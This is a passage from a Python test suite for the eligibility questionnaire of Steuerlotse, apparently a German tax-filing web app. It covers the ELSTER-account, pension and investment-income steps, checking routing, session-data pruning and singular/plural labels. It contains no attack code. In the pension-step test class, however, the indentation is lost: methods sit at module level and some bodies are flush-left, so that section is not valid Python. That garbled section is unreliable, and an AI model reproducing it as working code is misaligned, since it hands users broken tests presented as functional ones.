            self.assertRaises(IncorrectEligibilityData, step.handle)

    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        expected = {'marital_status_eligibility': 'single',
                    'joint_taxes_eligibility': 'no',
                    'alimony_eligibility': 'no'}
        polluted = dict(expected, INCORRECT_KEY='UNNECESSARY_VALUE')
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(polluted)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(expected, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        stored = {'marital_status_eligibility': 'single',
                  'joint_taxes_eligibility': 'no',
                  'alimony_eligibility': 'no'}
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(stored)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(stored, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        expected_remaining = {'marital_status_eligibility': 'single',
                              'joint_taxes_eligibility': 'no',
                              'separated_since_last_year_eligibility': 'no',
                              'separated_joint_taxes_eligibility': 'no',
                              'separated_lived_together_eligibility': 'no',
                              'alimony_eligibility': 'no'}
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(FULL_SESSION_DATA)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(expected_remaining, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))
class TestSingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Tests for the ELSTER-account question shown to users filing alone."""

    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        self.app = app

    def setUp(self):
        self.correct_session_data = {'marital_status_eligibility': 'divorced',
                                     'joint_taxes_eligibility': 'no',
                                     'alimony_eligibility': 'no'}

    @staticmethod
    def _session_with(data):
        # Build a session cookie holding *data* under the eligibility key.
        return SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(data)})

    @staticmethod
    def _resolve_step(should_update, form_data):
        # Fetch this step from the chooser; requires an active request context.
        return EligibilityStepChooser('eligibility').get_correct_step(
            SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, should_update, form_data)

    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        with self.app.test_request_context(method='POST') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(True, ImmutableMultiDict({'user_a_has_elster_account_eligibility': 'no'}))
            target_url = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.next_url)

    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        # Both answers continue to the pension question; 'yes' is still a valid flow here.
        with self.app.test_request_context(method='POST') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(True, ImmutableMultiDict({'user_a_has_elster_account_eligibility': 'yes'}))
            target_url = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.next_url)

    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(self.correct_session_data)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            target_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(target_url, step.render_info.prev_url)

    @pytest.mark.usefixtures('test_request_context')
    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                   MagicMock(side_effect=PreviousFieldsMissingError)):
            step = self._resolve_step(True, ImmutableMultiDict({'user_a_has_elster_account_eligibility': 'no'}))
            self.assertRaises(IncorrectEligibilityData, step.handle)

    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        expected = {'marital_status_eligibility': 'single',
                    'user_a_has_elster_account_eligibility': 'no',
                    'joint_taxes_eligibility': 'no',
                    'alimony_eligibility': 'no'}
        polluted = dict(expected, INCORRECT_KEY='UNNECESSARY_VALUE')
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(polluted)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(expected, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        stored = {'marital_status_eligibility': 'single',
                  'user_a_has_elster_account_eligibility': 'no',
                  'joint_taxes_eligibility': 'no',
                  'alimony_eligibility': 'no'}
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(stored)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(stored, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))

    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        expected_remaining = {'marital_status_eligibility': 'single',
                              'separated_since_last_year_eligibility': 'no',
                              'separated_joint_taxes_eligibility': 'no',
                              'separated_lived_together_eligibility': 'no',
                              'user_a_has_elster_account_eligibility': 'no',
                              'joint_taxes_eligibility': 'no',
                              'alimony_eligibility': 'no'}
        with self.app.test_request_context(method='GET') as ctx:
            ctx.session = self._session_with(FULL_SESSION_DATA)
            step = self._resolve_step(False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(expected_remaining, deserialize_session_data(ctx.session[_ELIGIBILITY_DATA_KEY]))
class TestPensionEligibilityFailureDisplaySteuerlotseStep:
    """The pension failure page must link back to the pension decision step."""

    def test_handle_sets_correct_prev_url(self, test_request_context):
        render_info = PensionEligibilityFailureDisplaySteuerlotseStep.prepare_render_info({})
        step = PensionEligibilityFailureDisplaySteuerlotseStep(
            endpoint='eligibility', render_info=render_info)
        expected = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
        step.handle()
        assert step.render_info.prev_url == expected
class TestPensionDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
    # Autouse fixture: bridges the pytest `app` fixture into this unittest-style class
    # so setUp/tests can open request contexts via self.app.
    self.app = app
def setUp(self):
    """Baseline session data under which this pension step is reachable."""
    self.correct_session_data = dict(
        marital_status_eligibility='divorced',
        joint_taxes_eligibility='no',
        alimony_eligibility='no',
        user_a_has_elster_account_eligibility='no',
    )
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
    """Answering 'yes' to the pension question must advance to the investment-income step."""
    with self.app.test_request_context(method='POST') as ctx:
        ctx.session = SecureCookieSession(
            {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
        step = EligibilityStepChooser('eligibility').get_correct_step(
            PensionDecisionEligibilityInputFormSteuerlotseStep.name, True,
            form_data=ImmutableMultiDict({'pension_eligibility': 'yes'}))
        target_url = step.url_for_step(InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
        step.handle()
        self.assertEqual(target_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
    """Answering 'no' to the pension question must route to the failure page."""
    with self.app.test_request_context(method='POST') as ctx:
        ctx.session = SecureCookieSession(
            {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
        step = EligibilityStepChooser('eligibility').get_correct_step(
            PensionDecisionEligibilityInputFormSteuerlotseStep.name, True,
            form_data=ImmutableMultiDict({'pension_eligibility': 'no'}))
        target_url = step.url_for_step(PensionEligibilityFailureDisplaySteuerlotseStep.name)
        step.handle()
        self.assertEqual(target_url, step.render_info.next_url)
def test_if_no_joint_taxes_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_joint_taxes_user_a_no_elster_account_session_data_correct_then_set_prev_input_step_correctly(self):
alternative_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(UserAElsterAccountEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_joint_taxes_user_b_no_elster_account_session_data_correct_then_set_prev_input_step_correctly(self):
alternative_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'yes',
'user_b_has_elster_account_eligibility': 'no'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'pension_eligibility': 'yes'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_multiple_users_then_show_multiple_text(self):
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'alimony_eligibility': 'no',}
expected_number_of_users = 2
expected_choices = [('yes', ngettext('form.eligibility.pension.yes', 'form.eligibility.pension.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.pension.no', 'form.eligibility.pension.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.pension_eligibility.choices)
def test_if_single_user_then_show_single_text(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no'}
expected_number_of_users = 1
expected_choices = [('yes', ngettext('form.eligibility.pension.yes', 'form.eligibility.pension.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.pension.no', 'form.eligibility.pension.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.pension_eligibility.choices)
class TestInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Tests for the investment-income yes/no eligibility step.

    Same pattern as the other decision-step test classes: seed the session,
    fetch the step via EligibilityStepChooser, handle it, and verify routing,
    session-data pruning, and plural/singular choice labels.
    """
    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        # Pytest autouse fixture: expose the Flask app to every test method.
        self.app = app
    def setUp(self):
        # Session data for a single user who answered "yes" to the pension
        # question, i.e. valid input to reach the investment-income step.
        self.correct_session_data = {'marital_status_eligibility': 'divorced',
                                     'joint_taxes_eligibility': 'no',
                                     'alimony_eligibility': 'no',
                                     'user_a_has_elster_account_eligibility': 'no',
                                     'pension_eligibility': 'yes'}
    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'investment_income_eligibility': 'yes'}))
            # "yes" routes to the follow-up minimal investment income question.
            expected_url = step.url_for_step(MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)
    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'investment_income_eligibility': 'no'}))
            # "no" skips the investment-income sub-flow and goes to employment.
            expected_url = step.url_for_step(EmploymentDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)
    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            expected_url = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.prev_url)
    @pytest.mark.usefixtures('test_request_context')
    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        # Force validation of the preceding steps' data to fail.
        with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                   MagicMock(side_effect=PreviousFieldsMissingError)):
            step = EligibilityStepChooser('eligibility').get_correct_step(
                InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'investment_income_eligibility': 'yes'}))
            self.assertRaises(IncorrectEligibilityData, step.handle)
    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no', }
        # An unknown key must be stripped from the stored session data.
        session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no', }
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        # Only the keys relevant up to the investment-income question survive.
        only_necessary_data = {'marital_status_eligibility': 'single',
                               'separated_since_last_year_eligibility': 'no',
                               'separated_joint_taxes_eligibility': 'no',
                               'separated_lived_together_eligibility': 'no',
                               'user_a_has_elster_account_eligibility': 'no',
                               'user_b_has_elster_account_eligibility': 'no',
                               'joint_taxes_eligibility': 'no',
                               'alimony_eligibility': 'no',
                               'pension_eligibility': 'yes',
                               'investment_income_eligibility': 'no', }
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(only_necessary_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
    def test_if_multiple_users_then_show_multiple_text(self):
        session_data = {'marital_status_eligibility': 'married',
                        'separated_since_last_year_eligibility': 'no',
                        'joint_taxes_eligibility': 'yes',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes'}
        # Two users -> the plural ngettext variant of the choice labels is expected.
        expected_number_of_users = 2
        expected_choices = [('yes', ngettext('form.eligibility.investment_income.yes', 'form.eligibility.investment_income.yes', num=expected_number_of_users)),
                            ('no', ngettext('form.eligibility.investment_income.no', 'form.eligibility.investment_income.no', num=expected_number_of_users))]
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step._pre_handle()
            self.assertEqual(expected_choices, step.render_info.form.investment_income_eligibility.choices)
    def test_if_single_user_then_show_single_text(self):
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',}
        # One user -> the singular ngettext variant of the choice labels is expected.
        expected_number_of_users = 1
        expected_choices = [('yes', ngettext('form.eligibility.investment_income.yes', 'form.eligibility.investment_income.yes', num=expected_number_of_users)),
                            ('no', ngettext('form.eligibility.investment_income.no', 'form.eligibility.investment_income.no', num=expected_number_of_users))]
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step._pre_handle()
            self.assertEqual(expected_choices, step.render_info.form.investment_income_eligibility.choices)
class TestMinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
    """Tests for the "investment income below the minimal threshold?" step.

    Verifies routing (yes -> employment, no -> taxed-investment-income),
    error propagation, session-data pruning, and plural/singular labels.
    """
    @pytest.fixture(autouse=True)
    def attach_fixtures(self, app):
        # Pytest autouse fixture: expose the Flask app to every test method.
        self.app = app
    def setUp(self):
        # Valid data for a single user who reported investment income, i.e.
        # the prerequisite for reaching this step.
        self.correct_session_data = {'marital_status_eligibility': 'divorced',
                                     'joint_taxes_eligibility': 'no',
                                     'alimony_eligibility': 'no',
                                     'user_a_has_elster_account_eligibility': 'no',
                                     'pension_eligibility': 'yes',
                                     'investment_income_eligibility': 'yes'}
    def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'minimal_investment_income_eligibility': 'yes'}))
            # Income below the threshold -> continue directly with employment.
            expected_url = step.url_for_step(EmploymentDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)
    def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
        with self.app.test_request_context(method='POST') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'minimal_investment_income_eligibility': 'no'}))
            # Income above the threshold -> ask whether it was already taxed.
            expected_url = step.url_for_step(TaxedInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.next_url)
    def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            expected_url = step.url_for_step(InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
            step.handle()
            self.assertEqual(expected_url, step.render_info.prev_url)
    @pytest.mark.usefixtures('test_request_context')
    def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
        # Force validation of the preceding steps' data to fail.
        with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
                   MagicMock(side_effect=PreviousFieldsMissingError)):
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
                form_data=ImmutableMultiDict({'investment_income_eligibility': 'yes',
                                              'minimal_investment_income_eligibility': 'no'}))
            self.assertRaises(IncorrectEligibilityData, step.handle)
    def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'minimal_investment_income_eligibility': 'yes'}
        # An unknown key must be stripped from the stored session data.
        session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession(
                {_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
    def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'joint_taxes_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',
                        'minimal_investment_income_eligibility': 'yes'}
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(session_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
    def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
        # Only keys relevant up to the minimal-investment-income question survive.
        only_necessary_data = {'marital_status_eligibility': 'single',
                               'separated_since_last_year_eligibility': 'no',
                               'separated_lived_together_eligibility': 'no',
                               'separated_joint_taxes_eligibility': 'no',
                               'user_a_has_elster_account_eligibility': 'no',
                               'user_b_has_elster_account_eligibility': 'no',
                               'joint_taxes_eligibility': 'no',
                               'alimony_eligibility': 'no',
                               'pension_eligibility': 'yes',
                               'investment_income_eligibility': 'no',
                               'minimal_investment_income_eligibility': 'yes'}
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step.handle()
            self.assertEqual(only_necessary_data,
                             deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
    def test_if_multiple_users_then_show_multiple_text(self):
        session_data = {'marital_status_eligibility': 'married',
                        'separated_since_last_year_eligibility': 'no',
                        'joint_taxes_eligibility': 'yes',
                        'user_a_has_elster_account_eligibility': 'no',
                        'user_b_has_elster_account_eligibility': 'no',
                        'alimony_eligibility': 'no',
                        'pension_eligibility': 'yes',
                        'investment_income_eligibility': 'no',}
        # Two users -> the plural ngettext variant of the choice labels is expected.
        expected_number_of_users = 2
        expected_choices = [('yes', ngettext('form.eligibility.minimal_investment_income.yes', 'form.eligibility.minimal_investment_income.yes', num=expected_number_of_users)),
                            ('no', ngettext('form.eligibility.minimal_investment_income.no', 'form.eligibility.minimal_investment_income.no', num=expected_number_of_users))]
        with self.app.test_request_context(method='GET') as req:
            req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
            step = EligibilityStepChooser('eligibility').get_correct_step(
                MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
            step._pre_handle()
            self.assertEqual(expected_choices, step.render_info.form.minimal_investment_income_eligibility.choices)
    def test_if_single_user_then_show_single_text(self):
        session_data = {'marital_status_eligibility': 'single',
                        'separated_since_last_year_eligibility': 'no',
                        'user_a_has_elster_account_eligibility': 'no',
